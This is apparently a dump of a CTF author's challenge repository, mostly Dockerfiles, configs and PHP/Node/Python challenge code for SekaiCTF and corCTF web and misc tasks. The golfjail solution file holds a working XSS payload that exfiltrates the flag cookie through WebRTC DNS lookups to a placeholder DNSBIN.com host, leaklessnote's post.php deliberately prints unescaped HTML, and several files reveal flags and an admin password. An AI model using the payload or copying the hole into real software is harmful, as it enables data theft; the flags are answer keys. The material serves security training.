https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/64x64blind.png


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/9bc27292880429.5e569ff84e4d0.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/Real-World-CTF-2023/the_cult_of_8bit/code/static/assets/img/9bc27292880429.5e569ff84e4d0.gif


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '3'
 2 | services:
 3 |   web:
 4 |     image: rwctf:the-cult-of-8bit
 5 |     build: .
 6 |     tty: true
 7 |     ports:
 8 |       - "12345:12345"
 9 |     deploy:
10 |       resources:
11 |         limits:
12 |           memory: 2G
13 | 


--------------------------------------------------------------------------------
/Real-World-CTF-2023/the_cult_of_8bit/setup.sh:
--------------------------------------------------------------------------------
1 | nohup node /bot/bot.js & > /app/nohup.out
2 | nohup node app & > /app/nohup.out
3 | 
4 | redis-server /etc/redis/redis.conf
5 | 
6 | tail -f /app/nohup.out
7 | 


--------------------------------------------------------------------------------
/SekaiCTF-2022/crab-commodities/Dockerfile:
--------------------------------------------------------------------------------
 1 | # build phase
 2 | FROM rust:slim AS builder
 3 | 
 4 | WORKDIR /app
 5 | COPY ./chall .
 6 | RUN cargo build --release
 7 | 
 8 | # final image
 9 | FROM debian:bullseye-slim
10 | 
11 | WORKDIR /app
12 | COPY --from=builder /app/target/release/crabcommodities ./
13 | 
14 | RUN useradd -ms /bin/bash user
15 | USER user
16 | 
17 | CMD ["/app/crabcommodities"]


--------------------------------------------------------------------------------
/SekaiCTF-2022/crab-commodities/chall/Cargo.toml:
--------------------------------------------------------------------------------
 1 | [package]
 2 | name = "crabcommodities"
 3 | version = "0.1.0"
 4 | edition = "2021"
 5 | 
 6 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html
 7 | 
 8 | [dependencies]
 9 | actix-session = { version = "0.7.2", features = ["cookie-session"] }
10 | actix-web = "4.2.1"
11 | dashmap = "5.4.0"
12 | serde_json = "1.0.85"
13 | sha2 = "0.10.6"
14 | tera = "1.17.0"
15 | serde = { version = "1.0.144", features = ["derive"] }
16 | rand = { version = "0.8.5", features = ["std_rng"] }
17 | num-format = "0.4.0"
18 | clokwerk = "0.3.5"
19 | once_cell = "1.14.0"
20 | include_dir = { version = "0.7.2", features = ["glob"] }
21 | 


--------------------------------------------------------------------------------
/SekaiCTF-2022/obligatory-calc/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:slim
2 | WORKDIR /app
3 | COPY package.json package-lock.json ./
4 | COPY views ./views
5 | COPY public ./public
6 | RUN npm install
7 | COPY app.js .
8 | CMD ["node", "app.js"]
9 | 


--------------------------------------------------------------------------------
/SekaiCTF-2022/obligatory-calc/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "obligatory-calc",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "app.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "strellic",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "cookie-parser": "^1.4.6",
13 |     "express": "^4.18.1",
14 |     "hbs": "^4.2.0"
15 |   }
16 | }
17 | 


--------------------------------------------------------------------------------
/SekaiCTF-2022/obligatory-calc/public/css/styles.css:
--------------------------------------------------------------------------------
1 | #results :first-child {
2 |     font-weight: bold;
3 | }
4 | 
5 | iframe#calc {
6 |     display: none;
7 | }


--------------------------------------------------------------------------------
/SekaiCTF-2022/safelist/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM node:slim
2 | WORKDIR /app
3 | COPY package.json package-lock.json ./
4 | COPY views ./views
5 | COPY public ./public
6 | RUN npm install
7 | COPY app.js .
8 | CMD ["node", "app.js"]


--------------------------------------------------------------------------------
/SekaiCTF-2022/safelist/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "safelist",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "app.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.18.1",
13 |     "express-session": "^1.17.3",
14 |     "hbs": "^4.2.0",
15 |     "memorystore": "^1.6.7"
16 |   }
17 | }
18 | 


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/README.md:
--------------------------------------------------------------------------------
 1 | ## Golf Jail
 2 | 
 3 | ### Difficulty: 4
 4 | 
 5 | ### Description
 6 | 
 7 | I hope you like golfing ⛳🏌️⛳🏌️
 8 | 
 9 | [Admin Bot](https://xss-bot.chals.sekai.team/golfjail)
10 | 
11 | Author: strellic
12 | 
13 | <div style="background:#75fbde;border-radius:1rem;padding:1rem"><b>❖ Note</b><br>The admin bot only takes URLs of the format <code>/^https:\/\/golfjail\.chals\.sekai\.team\//</code></div>


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM alpine:latest
 2 | 
 3 | RUN adduser -D -u 1000 -g 1000 -s /bin/sh www
 4 | 
 5 | RUN apk add --no-cache --update php81-fpm supervisor nginx
 6 | 
 7 | COPY config/fpm.conf /etc/php81/php-fpm.d/www.conf
 8 | COPY config/supervisord.conf /etc/supervisord.conf
 9 | COPY config/nginx.conf /etc/nginx/nginx.conf
10 | 
11 | COPY challenge /www
12 | 
13 | RUN chown -R www:www /var/lib/nginx
14 | 
15 | EXPOSE 80
16 | 
17 | CMD /usr/bin/supervisord -c /etc/supervisord.conf


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/challenge/challenge/index.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     header("Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'unsafe-inline' 'unsafe-eval';");
 3 |     header("Cross-Origin-Opener-Policy: same-origin");
 4 | 
 5 |     $payload = "🚩🚩🚩";
 6 |     if (isset($_GET["xss"]) && is_string($_GET["xss"]) && strlen($_GET["xss"]) <= 30) {
 7 |         $payload = $_GET["xss"];
 8 |     }
 9 | 
10 |     $flag = "SEKAI{test_flag}";
11 |     if (isset($_COOKIE["flag"]) && is_string($_COOKIE["flag"])) {
12 |         $flag = $_COOKIE["flag"];
13 |     }
14 | ?>
15 | <!DOCTYPE html>
16 | <html>
17 |     <body>
18 |         <iframe
19 |             sandbox="allow-scripts"
20 |             srcdoc="<!-- <?php echo htmlspecialchars($flag) ?> --><div><?php echo htmlspecialchars($payload); ?></div>"
21 |         ></iframe>
22 |     </body>
23 | </html>
24 | 


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/challenge/config/fpm.conf:
--------------------------------------------------------------------------------
 1 | [global]
 2 | daemonize = no
 3 | error_log = /dev/stderr
 4 | log_level = notice
 5 | 
 6 | [www]
 7 | user = www
 8 | group = www
 9 | 
10 | clear_env = Off
11 | 
12 | listen = /run/php-fpm.sock
13 | listen.owner = www
14 | listen.group = www
15 | 
16 | pm = dynamic
17 | pm.max_children = 5
18 | pm.start_servers = 2
19 | pm.min_spare_servers = 1
20 | pm.max_spare_servers = 3


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/challenge/config/nginx.conf:
--------------------------------------------------------------------------------
 1 | user www;
 2 | pid /run/nginx.pid;
 3 | error_log /dev/stderr info;
 4 | 
 5 | events {
 6 |     worker_connections 1024;
 7 | }
 8 | 
 9 | http {
10 |     server_tokens off;
11 |     charset utf-8;
12 |     keepalive_timeout 20s;
13 |     sendfile on;
14 |     tcp_nopush on;
15 |     client_max_body_size 1M;
16 | 
17 |     include /etc/nginx/mime.types;
18 | 
19 |     server {
20 |         listen 80;
21 |         server_name _;
22 | 
23 |         index index.php;
24 |         root /www;
25 | 
26 |         location / {
27 |             try_files $uri $uri/ /index.php?$query_string;
28 |             location ~ \.php$ {
29 |                 try_files $uri =404;
30 |                 fastcgi_pass unix:/run/php-fpm.sock;
31 |                 fastcgi_index index.php;
32 |                 fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
33 |                 include fastcgi_params;
34 |             }
35 |         }
36 |     }
37 | }


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/challenge/config/supervisord.conf:
--------------------------------------------------------------------------------
 1 | [supervisord]
 2 | user=root
 3 | nodaemon=true
 4 | logfile=/dev/null
 5 | logfile_maxbytes=0
 6 | pidfile=/run/supervisord.pid
 7 | 
 8 | [program:fpm]
 9 | command=php-fpm81 -F
10 | autostart=true
11 | priority=1000
12 | stdout_logfile=/dev/stdout
13 | stdout_logfile_maxbytes=0
14 | stderr_logfile=/dev/stderr
15 | stderr_logfile_maxbytes=0
16 | 
17 | [program:nginx]
18 | command=nginx -g 'daemon off;'
19 | autostart=true
20 | stdout_logfile=/dev/stdout
21 | stdout_logfile_maxbytes=0
22 | stderr_logfile=/dev/stderr
23 | stderr_logfile_maxbytes=0


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/dist/golfjail.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     header("Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; script-src 'unsafe-inline' 'unsafe-eval';");
 3 |     header("Cross-Origin-Opener-Policy: same-origin");
 4 | 
 5 |     $payload = "🚩🚩🚩";
 6 |     if (isset($_GET["xss"]) && is_string($_GET["xss"]) && strlen($_GET["xss"]) <= 30) {
 7 |         $payload = $_GET["xss"];
 8 |     }
 9 | 
10 |     $flag = "SEKAI{test_flag}";
11 |     if (isset($_COOKIE["flag"]) && is_string($_COOKIE["flag"])) {
12 |         $flag = $_COOKIE["flag"];
13 |     }
14 | ?>
15 | <!DOCTYPE html>
16 | <html>
17 |     <body>
18 |         <iframe
19 |             sandbox="allow-scripts"
20 |             srcdoc="<!-- <?php echo htmlspecialchars($flag) ?> --><div><?php echo htmlspecialchars($payload); ?></div>"
21 |         ></iframe>
22 |     </body>
23 | </html>
24 | 


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/solution/solve.txt:
--------------------------------------------------------------------------------
1 | https://golfjail.chals.sekai.team/?a=`;/*&xss=%3Csvg%20onload=eval(%27`%27%2BbaseURI)%3E&b=*/pc=new/**/RTCPeerConnection({[`iceServers`]:[{[`urls`]:[`stun:${document.childNodes[0].textContent.split(``).map(function(c){return/**/c.charCodeAt(0).toString(16)}).join(``).slice(0,32)}.DNSBIN.com`]}]});pc.createOffer({offerToReceiveAudio:1}).then(function(o){pc.setLocalDescription(o)});


--------------------------------------------------------------------------------
/SekaiCTF-2023/golfjail/values.yaml:
--------------------------------------------------------------------------------
 1 | challenge:
 2 |   name: golfjail
 3 |   category: web
 4 |   type: http
 5 | 
 6 | deployment:
 7 |   replicas: 3
 8 |   wave: 1
 9 |   env:
10 | 
11 | network:
12 |   internalport: 80
13 |   externalport: 80
14 |   nodeport: 30014
15 |   egress: allow
16 | 
17 | containers:
18 |   - name: golfjail
19 |     image: gcr.io/sekaictf-2023/web_golfjail:latest
20 |     resources:
21 |       requests:
22 |         cpu: 100m
23 |         memory: 100Mi
24 |       limits:
25 |         cpu: 1000m
26 |         memory: 1000Mi
27 |     ports:
28 |     - containerPort: 80
29 | 


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/.values.yaml:
--------------------------------------------------------------------------------
 1 | challenge:
 2 |   name: leaklessnote
 3 |   category: web
 4 |   type: http
 5 | 
 6 | deployment:
 7 |   replicas: 1
 8 |   wave: 1
 9 |   env:
10 | 
11 | network:
12 |   internalport: 80
13 |   externalport: 80
14 |   nodeport: 30016
15 |   egress: allow
16 | 
17 | containers:
18 |   - name: leaklessnote
19 |     image: gcr.io/sekaictf-2023/web_leaklessnote:latest
20 |     env:
21 |       FLAG: SEKAI{opleakerorz}
22 |       ADMIN_PASSWORD: vJaYYLdClmQiTMaKVLmKtFWbcPpHPgRX
23 |     resources:
24 |       requests:
25 |         cpu: 1000m
26 |         memory: 200Mi
27 |     ports:
28 |     - containerPort: 80
29 | 


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/README.md:
--------------------------------------------------------------------------------
 1 | ## Leakless Note
 2 | 
 3 | ### Difficulty: 5
 4 | 
 5 | ### Description
 6 | 
 7 | This time my note application will have no leaks!
 8 | 
 9 | [Admin Bot](https://xss-bot.chals.sekai.team/leaklessnote)
10 | 
11 | Author: strellic
12 | 
13 | <div style="background:#75fbde;border-radius:1rem;padding:1rem">
14 |     <b>❖ Note</b>
15 | 	<br>Flag format: <code>SEKAI{[a-z]+}</code>.
16 | 	<br>The admin bot is running Chrome v115 with incognito. Use the provided `adminbot.js` for testing.
17 | </div>


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/challenge/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM alpine:latest
 2 | 
 3 | RUN adduser -D -u 1000 -g 1000 -s /bin/sh www
 4 | 
 5 | RUN apk add --no-cache --update php81-fpm php81-pdo php81-pdo_sqlite php81-session supervisor nginx
 6 | 
 7 | COPY config/fpm.conf /etc/php81/php-fpm.d/www.conf
 8 | COPY config/supervisord.conf /etc/supervisord.conf
 9 | COPY config/nginx.conf /etc/nginx/nginx.conf
10 | COPY config/php.ini /etc/php81/php.ini
11 | 
12 | COPY challenge /www
13 | 
14 | RUN chown -R www:www /var/lib/nginx
15 | 
16 | EXPOSE 80
17 | 
18 | CMD /usr/bin/supervisord -c /etc/supervisord.conf


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/challenge/challenge/db.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     $db = new PDO('sqlite:/tmp/leaklessnote.db');
 3 |     $db->exec("CREATE TABLE IF NOT EXISTS users (username TEXT, password TEXT);");
 4 |     $db->exec("CREATE TABLE IF NOT EXISTS posts (username TEXT, id TEXT, title TEXT, contents TEXT);");
 5 | 
 6 |     // check for admin user
 7 |     $stmt = $db->prepare("SELECT * FROM users WHERE username=?");
 8 |     $stmt->execute(["admin"]);
 9 |     $user = $stmt->fetch();
10 | 
11 |     if (!$user) {
12 |         // initialize admin user
13 |         $admin_password = getenv("ADMIN_PASSWORD") ?: "admin_password";
14 |         $hash = password_hash($admin_password, PASSWORD_BCRYPT);
15 |         $stmt = $db->prepare("INSERT INTO users (username, password) VALUES (?, ?)");
16 |         $stmt->execute(["admin", $hash]);
17 |         // initialize flag post
18 |         $stmt = $db->prepare("INSERT INTO posts (username, id, title, contents) VALUES (?, ?, ?, ?)");
19 |         $stmt->execute(["admin", bin2hex(random_bytes(8)), "flag", getenv("FLAG") ?: "SEKAI{test_flag}"]);
20 |     }
21 | ?>


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/challenge/challenge/post.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 |     include "db.php";
 3 |     header("Cache-Control: no-cache, no-store");
 4 |     
 5 |     if (!isset($_GET["id"]) || !is_string($_GET["id"])) {
 6 |         die("Missing id");
 7 |     }
 8 | 
 9 |     $stmt = $db->prepare("SELECT * FROM posts WHERE id=?");
10 |     $stmt->execute([$_GET["id"]]);
11 |     $post = $stmt->fetch();
12 | 
13 |     if (!$post) {
14 |         die("No post was found with that id");
15 |     }
16 | ?>
17 | <!DOCTYPE html>
18 | <html>
19 |     <head>
20 |         <meta name="viewport" content="width=device-width" />
21 |         <meta charset="utf-8" />
22 |         <title>leaklessnote</title>
23 |     </head>
24 |     <body>
25 |         <div>
26 |             <h1>leaklessnote</h1>
27 |             <hr />
28 |             <h3><?php echo htmlspecialchars($post["title"]) ?></h3>
29 |             <div id="contents"><?php echo $post["contents"]; ?></div>
30 |             <hr />
31 |             <a href="/">Back</a>
32 |         </div>
33 |     </body>
34 | </html>


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/challenge/config/fpm.conf:
--------------------------------------------------------------------------------
 1 | [global]
 2 | daemonize = no
 3 | error_log = /dev/stderr
 4 | log_level = notice
 5 | 
 6 | [www]
 7 | user = www
 8 | group = www
 9 | 
10 | clear_env = Off
11 | 
12 | listen = /run/php-fpm.sock
13 | listen.owner = www
14 | listen.group = www
15 | 
16 | pm = dynamic
17 | pm.max_children = 5
18 | pm.start_servers = 2
19 | pm.min_spare_servers = 1
20 | pm.max_spare_servers = 3


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/challenge/config/nginx.conf:
--------------------------------------------------------------------------------
 1 | user www;
 2 | pid /run/nginx.pid;
 3 | error_log /dev/stderr info;
 4 | 
 5 | events {
 6 |     worker_connections 1024;
 7 | }
 8 | 
 9 | http {
10 |     server_tokens off;
11 |     charset utf-8;
12 |     keepalive_timeout 20s;
13 |     sendfile on;
14 |     tcp_nopush on;
15 |     client_max_body_size 1M;
16 | 
17 |     include /etc/nginx/mime.types;
18 | 
19 |     server {
20 |         listen 80;
21 |         server_name _;
22 | 
23 |         index index.php;
24 |         root /www;
25 | 
26 |         location / {
27 |             try_files $uri $uri/ /index.php?$query_string;
28 |             add_header Content-Security-Policy "default-src 'self'; script-src 'none'; object-src 'none'; frame-ancestors 'none';";
29 |             location ~ \.php$ {
30 |                 try_files $uri =404;
31 |                 fastcgi_pass unix:/run/php-fpm.sock;
32 |                 fastcgi_index index.php;
33 |                 fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
34 |                 include fastcgi_params;
35 |             }
36 |         }
37 |     }
38 | }


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/challenge/config/php.ini:
--------------------------------------------------------------------------------
1 | extension=pdo_sqlite
2 | extension=sqlite3
3 | [sqlite3]
4 | ; https://php.net/sqlite3.extension-dir
5 | ;sqlite3.extension_dir =
6 | ; the sqlite_dbpage virtual table.
7 | ; https://www.sqlite.org/c3ref/c_dbconfig_defensive.html
8 | ;sqlite3.defensive = 1


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/challenge/config/supervisord.conf:
--------------------------------------------------------------------------------
 1 | [supervisord]
 2 | user=root
 3 | nodaemon=true
 4 | logfile=/dev/null
 5 | logfile_maxbytes=0
 6 | pidfile=/run/supervisord.pid
 7 | 
 8 | [program:fpm]
 9 | command=php-fpm81 -F
10 | autostart=true
11 | priority=1000
12 | stdout_logfile=/dev/stdout
13 | stdout_logfile_maxbytes=0
14 | stderr_logfile=/dev/stderr
15 | stderr_logfile_maxbytes=0
16 | 
17 | [program:nginx]
18 | command=nginx -g 'daemon off;'
19 | autostart=true
20 | stdout_logfile=/dev/stdout
21 | stdout_logfile_maxbytes=0
22 | stderr_logfile=/dev/stderr
23 | stderr_logfile_maxbytes=0


--------------------------------------------------------------------------------
/SekaiCTF-2023/leaklessnote/dist/leaklessnote.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/SekaiCTF-2023/leaklessnote/dist/leaklessnote.tar.gz


--------------------------------------------------------------------------------
/corCTF-2021/misc/flagbot/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Medium
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | Make sure you joined our Discord server! Why don't you check out my new robot friend FlagBot in #bot-spam, I think you'll like the song he's playing...
 8 | 
 9 | NOTE: This is NOT an OSINT challenge. The bot is playing an unlisted YouTube video and the flag is in the description. This is not a guessing challenge.
10 | ```
11 | 
12 | Flag: `corctf{v3ry_g00d_mu51c!!}`
13 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/flagbot/discord/.dockerignore:
--------------------------------------------------------------------------------
1 | Dockerfile
2 | node_modules
3 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/flagbot/discord/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM debian:buster-slim
 2 | 
 3 | RUN apt-get update && apt-get upgrade -y
 4 | RUN apt-get install curl -y
 5 | RUN curl -fsSL https://deb.nodesource.com/setup_16.x | bash -
 6 | RUN apt-get install -y nodejs ffmpeg -y
 7 | 
 8 | WORKDIR /usr/src/app
 9 | COPY package.json .
10 | 
11 | RUN npm install
12 | 
13 | COPY . .
14 | 
15 | RUN chmod -R 644 /usr/src/app
16 | 
17 | # save disk space :^)
18 | RUN dpkg --remove --force-depends python2.7-minimal python3-minimal python3.7-minimal 
19 | RUN rm /usr/bin/perl
20 | RUN apt-get clean && apt-get autoclean && rm -rf /var/lib/apt/lists/*
21 | 
22 | CMD ["node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/misc/flagbot/discord/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "discord",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "discord.js": "^12.5.1",
13 |     "fluent-ffmpeg": "^2.1.2",
14 |     "mathjs": "^9.4.2",
15 |     "node-fetch": "^2.6.1",
16 |     "opusscript": "0.0.8"
17 |   }
18 | }
19 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/flagbot/web/.dockerignore:
--------------------------------------------------------------------------------
1 | Dockerfile
2 | node_modules
3 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/flagbot/web/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM debian:buster-slim
 2 | 
 3 | RUN apt-get update && apt-get upgrade -y
 4 | RUN apt-get install curl -y
 5 | RUN curl -fsSL https://deb.nodesource.com/setup_16.x | bash -
 6 | RUN apt-get install -y nodejs ffmpeg -y
 7 | 
 8 | WORKDIR /usr/src/app
 9 | 
10 | COPY package.json .
11 | 
12 | RUN npm install
13 | 
14 | COPY . .
15 | 
16 | RUN chmod -R 644 /usr/src/app
17 | 
18 | # save disk space :^)
19 | RUN dpkg --remove --force-depends python2.7-minimal python3-minimal python3.7-minimal 
20 | RUN rm /usr/bin/perl
21 | RUN apt-get clean && apt-get autoclean && rm -rf /var/lib/apt/lists/*
22 | 
23 | CMD ["timeout", "5m", "node", "index.js"]


--------------------------------------------------------------------------------
/corCTF-2021/misc/flagbot/web/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "web",
 3 |   "version": "1.0.0",
 4 |   "description": "",
 5 |   "main": "index.js",
 6 |   "scripts": {
 7 |     "test": "echo \"Error: no test specified\" && exit 1"
 8 |   },
 9 |   "author": "",
10 |   "license": "ISC",
11 |   "dependencies": {
12 |     "express": "^4.17.1",
13 |     "ytdl-core": "^4.8.3"
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/README.md:
--------------------------------------------------------------------------------
 1 | Difficulty: Medium
 2 | 
 3 | Author: Strellic
 4 | 
 5 | Description:
 6 | ```
 7 | Hey, I made a chess website to play my favorite variant, smog of war! Why don't you check it out and play against my AI. He has some nasty surprises, but if you beat him I'll give you a flag.. good luck :)
 8 | ```
 9 | 
10 | Flag: `corctf{"The opportunity of defeating the enemy is provided by the enemy himself." - Sun Tzu}`
11 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM python:3.9.6-slim-buster
 2 | 
 3 | RUN apt-get update && apt-get install curl unzip -y && rm -rf /var/lib/apt/lists/*
 4 | 
 5 | RUN mkdir -p /app
 6 | 
 7 | WORKDIR /app
 8 | 
 9 | COPY requirements.txt .
10 | 
11 | RUN pip install -r requirements.txt
12 | 
13 | COPY . .
14 | 
15 | RUN curl https://stockfishchess.org/files/stockfish_14_linux_x64_avx2.zip --output stockfish_14_linux_x64_avx2.zip
16 | 
17 | RUN unzip stockfish_14_linux_x64_avx2.zip
18 | 
19 | CMD ["sh", "start.sh"]
20 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/app.py:
--------------------------------------------------------------------------------
 1 | from flask import Flask, render_template, request
 2 | from flask_socketio import SocketIO, emit
 3 | 
 4 | import game
 5 | 
 6 | app = Flask(__name__, static_url_path='', static_folder='static')
 7 | app.config['SECRET_KEY'] = 'secret!'
 8 | socketio = SocketIO(app)
 9 | 
10 | @app.route('/')
11 | def index_route():
12 |     return app.send_static_file('index.html')
13 | 
14 | @socketio.on('connect')
15 | def on_connect():
16 |     game.start(request.sid, emit)
17 |     emit('state', game.get(request.sid).get_player_state())
18 | 
19 | @socketio.on('disconnect')
20 | def on_disconnect():
21 |     game.destroy(request.sid)
22 | 
23 | @socketio.on('move')
24 | def onmsg_move(move):
25 |     game.get(request.sid).player_move(move)


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/requirements.txt:
--------------------------------------------------------------------------------
 1 | bidict==0.21.2
 2 | chess==1.6.1
 3 | click==8.0.1
 4 | dnspython==1.16.0
 5 | eventlet==0.30.2
 6 | Flask==2.0.1
 7 | Flask-SocketIO==5.1.1
 8 | greenlet==1.1.1
 9 | gunicorn==20.1.0
10 | itsdangerous==2.0.1
11 | Jinja2==3.0.1
12 | MarkupSafe==2.0.1
13 | python-engineio==4.2.1
14 | python-socketio==5.4.0
15 | six==1.16.0
16 | Werkzeug==2.0.1
17 | stockfish==3.17.0
18 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/start.sh:
--------------------------------------------------------------------------------
1 | gunicorn --worker-class eventlet -w 1 --bind 0.0.0.0:80 app:app
2 | 


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/css/chessboard-1.0.0.min.css:
--------------------------------------------------------------------------------
1 | /*! chessboard.js v1.0.0 | (c) 2019 Chris Oakman | MIT License chessboardjs.com/license */
2 | .clearfix-7da63{clear:both}.board-b72b1{border:2px solid #404040;box-sizing:content-box}.square-55d63{float:left;position:relative;-webkit-touch-callout:none;-webkit-user-select:none;-khtml-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.white-1e1d7{background-color:#f0d9b5;color:#b58863}.black-3c85d{background-color:#b58863;color:#f0d9b5}.highlight1-32417,.highlight2-9c5d2{box-shadow:inset 0 0 3px 3px #ff0}.notation-322f9{cursor:default;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;position:absolute}.alpha-d2270{bottom:1px;right:3px}.numeric-fc462{top:2px;left:2px}


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/css/styles.css:
--------------------------------------------------------------------------------
 1 | body {
 2 |   background-color: #161925;
 3 |   height: 100vh;
 4 | }
 5 | 
 6 | h1, h2, h3, h4, h5, h6 {
 7 |   color: #f1f2f6;
 8 | }
 9 | 
10 | .card-title, .card-text {
11 |   color: #161925;
12 | }
13 | 
14 | .chessboard-parent {
15 |     width: 75vh;
16 | }
17 | 
18 | #chessboard {
19 |     height: 100%;
20 |     width: 100%;
21 | }


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bB.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bK.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bK.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bN.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bN.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bP.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bP.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bQ.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bQ.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bR.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/bR.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wB.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wB.png


--------------------------------------------------------------------------------
/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wK.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/strellic/my-ctf-challenges/8a8e36fd400c3900837c2faafba456c17ce1f28c/corCTF-2021/misc/smogofwar/chall/static/img/chesspieces/wikipedia/wK.png


